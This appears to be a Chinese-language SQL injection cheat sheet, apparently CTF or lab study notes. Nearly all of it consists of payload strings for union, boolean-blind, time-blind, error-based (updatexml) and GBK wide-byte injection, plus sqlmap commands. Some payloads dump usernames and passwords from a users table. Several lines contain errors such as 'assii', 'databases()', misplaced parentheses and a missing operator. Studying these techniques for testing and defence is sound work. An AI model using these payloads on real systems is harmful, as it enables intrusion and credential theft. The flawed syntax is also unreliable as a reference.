SQL注入:服务端将用户输入的数据当成SQL代码去执行
前期知识
information_schema数据库里面有tables表 表里字段TABLE_SCHEMA(存放所有数据库) 和TABLE_NAME(存放所有表)
column_name 数据库里面有 TABLE_SCHEMA 和TABLE_NAME(表)
select 1,table_name from information_schema.tables where table_schema == databases();
select 1,column_name from information_schema.columns where table_schema =databases() and table_name = ‘flag’;
有回显
联合注入
?id=1’order by 3 –+
?id=-1’union select 1,2,3–+
?id=-1’union select 1,database(),version()–+
?id=-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’–+
?id=-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’users’–+
?id=-1′ union select 1,2,group_concat(username ,id , password) from users–+
盲注步骤
布尔盲注
id=1′ and length(database())=8–+ 根据是否报错判断数据库的长度
id=1′ and substr(database(),1,1)=’s’–+ 根据报错判断字符串第一个字符是否是s 这个只能用=去测试
id=1′ and ascii(substr(database(),1,1))>100–+ 一个一个测试太慢了,使用assii函数
id=1′ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 –+ 根据报错找字段长度
id=1′ and assii(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)>1–+ 找字段
时间盲注
id=1′ and if(length(database()>1,0,sleep(3))) –+ 判断数据库是否大于1,大于1就输出0,否则睡眠3秒
id=1′ and if(assii(substr(database(),1,1)>1,0,sleep(3))) –+
id=1′ and if(assii(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)0,sleep(3)) –+
报错注入
updatexml函数 updatexml(目标内容,XML文档路径,更新的内容)
1.or updatexml(1,concat(0x7e,(select database()),0x7e),1) XML文档路径的位置里写入子查询,我们输入特殊字符,然后就因为不符合输入规则然后就报错
先执行子查询 0x7e是16进制也就是~符号
2.or select updatexml(1,concat(0x7e,(select table_name from information_schema.tables where tables_schema = databases() limit 0,1),0x7e),1)
3.or select updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=databases() and table_name =’xx’ limit 0,1),0x7e),1)
宽字节注入(编码必须为GBK)
1.?id=-1%df%5c’order by 3 –+
2.?id=-1%df%5c’union select 1,2,3–+
3.?id=-1%df%5c’union select 1,database(),2 –+
4.?id=-1%df%5c’union select 1,table_name from information_schema.tables where table_schema=database() limit 3,1 –+
5.?id=-1%df%5c’union select 1,column_name from information_schema.columns where tables_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1) limit 1,2 –+
6.?id=-1%df%5c’union select 1,usename,password from users –+
绕WAF之内敛注释
sqlmap跑get请求
python sqlmap.py -u url –batch
跑post请求
python sqlmap.py -u url –form –batch